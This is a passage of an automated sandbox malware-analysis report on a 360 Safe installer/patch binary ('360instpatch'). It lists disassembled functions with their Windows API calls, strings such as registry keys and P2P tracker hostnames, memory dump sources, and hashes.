                                                                                                                                                                                                                • Part of subcall function 00B7E951: __EH_prolog3.LIBCMT ref: 00B7E958
                                                                                                                                                                                                                • Part of subcall function 00B7E334: __EH_prolog3.LIBCMT ref: 00B7E33B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$H_prolog3_memset$AppendFolderSpecialUnothrow_t@std@@@__ehfuncinfo$??2@$CountCriticalDiskException@8FreeInitializeSectionSpaceString_base::_ThrowTickXlen__wsplitpath_wcsnlenstd::_
                                                                                                                                                                                                              • String ID: 360Safe$360\360Safe$:\360Safe
                                                                                                                                                                                                              • API String ID: 1315137449-2735685471
                                                                                                                                                                                                              • Opcode ID: 8e9a4c2130e6ed0b1183c1a4f032d98bf4eeddfded37a853fe56b2a805ee60ea
                                                                                                                                                                                                              • Instruction ID: f19ad740db62ceecc89ebd16fe8ff9008d6a3c1b1bb24661df6b4c8c31d5d31f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9a4c2130e6ed0b1183c1a4f032d98bf4eeddfded37a853fe56b2a805ee60ea
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8E15F71D00229DBCF15EBA4CC96AEEB7F5EF08310F1444A9F429A7291DB309A45CBA5
                                                                                                                                                                                                              Function 6CD9A86A Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 246COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6CD9A871
                                                                                                                                                                                                                • Part of subcall function 6CD2C2CF: lstrlenW.KERNEL32(00000010,THEME.UI,?,00000000,6CD40BA5,?,00000008,6CD4DEF0,?,00000010,?), ref: 6CD2C2F9
                                                                                                                                                                                                                • Part of subcall function 6CDAA9FC: __EH_prolog3.LIBCMT ref: 6CDAAA03
                                                                                                                                                                                                                • Part of subcall function 6CDAA916: __EH_prolog3.LIBCMT ref: 6CDAA91D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3$lstrlen
                                                                                                                                                                                                              • String ID: %d,%d,%d,%d$0,0,0,0$0x%x$anchor$bound$control_style$margin$shortcut$style$tab_id$tip$zl
                                                                                                                                                                                                              • API String ID: 1485999228-1181160698
                                                                                                                                                                                                              • Opcode ID: 72fa7020ed6a41ec7dfc0dba70d49e3c44a3f0c6c3ff1c4e6102c78218f3abce
                                                                                                                                                                                                              • Instruction ID: b30211d0d2ccb6dd37b27bc40fc537d0b8386d4e8b6f8149236e08a3961419c2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72fa7020ed6a41ec7dfc0dba70d49e3c44a3f0c6c3ff1c4e6102c78218f3abce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D49184B1E14248BBDF05EBD9C801AEEBFB9AF99218F10454DF10573790CB395A0487B6
                                                                                                                                                                                                              Function 6BF0D16D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 213registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BF0D174
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF0D188
                                                                                                                                                                                                                • Part of subcall function 6BEE8514: char_traits.LIBCPMT ref: 6BEE8539
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF0D391
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,manual_v3,00000000,?), ref: 6BF0D3D0
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 6BF0D3E4
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,PeerNumPerS,00000000,?,00000000,?), ref: 6BF0D413
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 6BF0D42C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCountQueryTickValue$H_prolog3_char_traits
                                                                                                                                                                                                              • String ID: PeerNumPerS$[%d.] File = %s $[%d.] FileName = %s$[%d.] Task Start$manual_v3
                                                                                                                                                                                                              • API String ID: 3290833672-1291513648
                                                                                                                                                                                                              • Opcode ID: e026fd41c106cb45f75b6855170665237406e2282b949985adf63802f1065906
                                                                                                                                                                                                              • Instruction ID: f0c06480669b451c898fc155e156d8e0db242c9e23cf5c102986911519861c3a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e026fd41c106cb45f75b6855170665237406e2282b949985adf63802f1065906
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5581AC77940B06EFDB24CFA4C8A0AAAB7F6BF45304F00456DE86692270DB39E544DB61
                                                                                                                                                                                                              Function 00B929E0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 165registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B92A1F
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards,00000000,00000008,?,?,?,?), ref: 00B92A3A
                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00BFCDA4,?,?,?,?), ref: 00B92A6C
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,?,?,?,?), ref: 00B92A96
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32 ref: 00B92ACE
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B92AE7
                                                                                                                                                                                                                • Part of subcall function 00B928D0: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000104,00000000), ref: 00B9291E
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,00000000), ref: 00B92B18
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00B92B63
                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00B92B89
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00B92BA0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards, xrefs: 00B92A30
                                                                                                                                                                                                              • ServiceName, xrefs: 00B92ABC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseEnumOpen_memset$CreateFileQueryValuelstrcmp
                                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards$ServiceName
                                                                                                                                                                                                              • API String ID: 2630661138-1795789498
                                                                                                                                                                                                              • Opcode ID: 5a46f6c64a90942eec82c50cae945434925e35356a7b9226fce10a1feee371ad
                                                                                                                                                                                                              • Instruction ID: fcb99b5dd91a941f7e6df81e16f081f8e0cc1b3ca888720d98699d3ac8aa9c96
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a46f6c64a90942eec82c50cae945434925e35356a7b9226fce10a1feee371ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33517E71604341AFEB24CF64CC85FABB7E8EB88704F04496DB59997190EB70E909C7A2
                                                                                                                                                                                                              Function 00B842DE Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 139fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B842FD
                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,0000000C), ref: 00B84327
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B8438A
                                                                                                                                                                                                              • QueryDosDeviceW.KERNEL32(?,00000000,00000400,00000400,?,?,\\.\), ref: 00B843BA
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00B843D6
                                                                                                                                                                                                              • __wcsnicmp.LIBCMT ref: 00B843E1
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00020000,00000001,00000000,00000003,00000080,00000000,000000FF,?,?,\\.\), ref: 00B84418
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 00B84461
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,\\.\), ref: 00B8446C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,\\.\), ref: 00B84489
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseDeviceHandle$ControlCreateDriveFileH_prolog3QueryType__wcsnicmp_memset_wcslen
                                                                                                                                                                                                              • String ID: \Device\Harddisk$\\.\
                                                                                                                                                                                                              • API String ID: 3469461504-3168084310
                                                                                                                                                                                                              • Opcode ID: 14d23a7ea76df9b218ed0b1dc2ae21a37644d781eec4a12b845595f0eb3fb517
                                                                                                                                                                                                              • Instruction ID: 37dbc2607bf7fa6441615fe2093ab567b0c5f3b27a7eb9224c9e41fde1f00e58
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14d23a7ea76df9b218ed0b1dc2ae21a37644d781eec4a12b845595f0eb3fb517
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C41BDB1500119ABCB10EFA4DC81FFEB7E8EF08710F540579FA25A7290DB309A09CB65
                                                                                                                                                                                                              Function 6CD26EE0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 114memorysynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(A6233702,?,?,?,?,?,?,?,6CE04B2B,000000FF), ref: 6CD26F26
                                                                                                                                                                                                                • Part of subcall function 6CD26C60: _vswprintf_s.LIBCMT ref: 6CD26C8A
                                                                                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,6CE04B2B,000000FF), ref: 6CD26F5B
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,6CE04B2B,000000FF), ref: 6CD26F6E
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,6CE04B2B,000000FF), ref: 6CD26F7E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,6CE04B2B,000000FF), ref: 6CD26F9C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,6CE04B2B,000000FF), ref: 6CD26FAD
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CD26FE7
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CD27011
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 6CD27029
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6CD27034
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Exception@8HeapMutexProcessThrow$AllocCloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_vswprintf_s
                                                                                                                                                                                                              • String ID: %s %u$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
                                                                                                                                                                                                              • API String ID: 3526415198-332789905
                                                                                                                                                                                                              • Opcode ID: 43c437284523dce8248f7ce3c17b0be449cc7a6453642472cd41c92760a1a515
                                                                                                                                                                                                              • Instruction ID: b433c16dd4a4ce12222ba4aa6255b2ebf57bd6cc008c004ccc60db7230a1b4ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43c437284523dce8248f7ce3c17b0be449cc7a6453642472cd41c92760a1a515
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7341E672A05248EFCF209FA4CD84B9E77B4FB05318F51462DF915E3680EB3959498BA1
                                                                                                                                                                                                              Function 6BF11DB5 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 78threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF11DBC
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BF11DC6
                                                                                                                                                                                                                • Part of subcall function 6BEFAE3C: KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,6BF78AA8,00000018,6BF2E73E,00000000), ref: 6BEFAE6F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF11DF3
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF11DFB
                                                                                                                                                                                                                • Part of subcall function 6BF0DF99: WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BF0DFA1
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF11E1A
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF11E2A
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: _memset.LIBCMT ref: 6BF24020
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: wvnsprintfW.SHLWAPI(?,000003FF,?,00007148), ref: 6BF2403B
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF11E57
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF11E63
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 6BF11E9E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [TaskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d., xrefs: 6BF11E41
                                                                                                                                                                                                              • [TaskScheduler] OnTimer cost:%dms, queue:%d., xrefs: 6BF11E74
                                                                                                                                                                                                              • p2sp.TaskScheduler, xrefs: 6BF11DC1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$_memset$CurrentDispatcherEventExceptionH_prolog3ObjectSingleThreadUserWaitwvnsprintf
                                                                                                                                                                                                              • String ID: [TaskScheduler] OnTimer cost:%dms, queue:%d.$[TaskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d.$p2sp.TaskScheduler
                                                                                                                                                                                                              • API String ID: 1333431131-1132454424
                                                                                                                                                                                                              • Opcode ID: 4bcbd4ddd8c0212a3fd1ebec64d06b13f6d4fd4d66da9abb75e0e807f5f0e487
                                                                                                                                                                                                              • Instruction ID: 47810cdb5457885cff9dc2f0215bf101e72173193bb4b1c193d116937e5573b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bcbd4ddd8c0212a3fd1ebec64d06b13f6d4fd4d66da9abb75e0e807f5f0e487
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84214D73D1022AAFCF40DFF4C941B9EBBF5BF18214F104556E511E6160E779AA148BA2
                                                                                                                                                                                                              Function 6BF368EC Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 297COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF368F3
                                                                                                                                                                                                                • Part of subcall function 6BF33A17: GetTickCount.KERNEL32 ref: 6BF33A23
                                                                                                                                                                                                                • Part of subcall function 6BF361A2: GetTickCount.KERNEL32 ref: 6BF36230
                                                                                                                                                                                                                • Part of subcall function 6BF361A2: GetTickCount.KERNEL32 ref: 6BF362BB
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF36914
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF369D2
                                                                                                                                                                                                              • htonl.WS2_32(?), ref: 6BF36A32
                                                                                                                                                                                                              • htonl.WS2_32(00000000), ref: 6BF36A53
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF36ABD
                                                                                                                                                                                                              • htonl.WS2_32(00000000), ref: 6BF36C21
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • agt.p.360.cn, xrefs: 6BF36978
                                                                                                                                                                                                              • [change tracker ip]: udp: %s ,tcpproxy:%s %d, xrefs: 6BF36A8F
                                                                                                                                                                                                              • [Use Tcp tracker Proxy] %s:%d, xrefs: 6BF36C51
                                                                                                                                                                                                              • tr.p.360.cn, xrefs: 6BF3694E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$htonl$H_prolog3
                                                                                                                                                                                                              • String ID: [Use Tcp tracker Proxy] %s:%d$[change tracker ip]: udp: %s ,tcpproxy:%s %d$agt.p.360.cn$tr.p.360.cn
                                                                                                                                                                                                              • API String ID: 559081447-3200203581
                                                                                                                                                                                                              • Opcode ID: cf6402f7a2d2c75051245f9547a4c7041608dd37e550b64426304942a48054ec
                                                                                                                                                                                                              • Instruction ID: 53d94e183842691377ab0226cfaa5df66d290382ac38a9ee1c952a8fe933dcde
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf6402f7a2d2c75051245f9547a4c7041608dd37e550b64426304942a48054ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AC1AE32504626AFDB14CF74C895BAAB3B2FF45304F14455DE46A5B2B0DB38B945CBA0
                                                                                                                                                                                                              Function 00B822E0 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 208comCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B822E7
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00BDC868,00000000,00000001,00BDC798,?,0000002C,00B845AD,?,?,?,?,?,?,?,?,?), ref: 00B82305
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00B82364
                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00B82389
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00B82405
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00B8240A
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00B82460
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • MediaType, xrefs: 00B82472
                                                                                                                                                                                                              • SELECT * FROM MSFT_PhysicalDisk WHERE DeviceId='%d', xrefs: 00B823A6
                                                                                                                                                                                                              • WQL, xrefs: 00B823D0
                                                                                                                                                                                                              • Root\Microsoft\Windows\Storage, xrefs: 00B8232D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
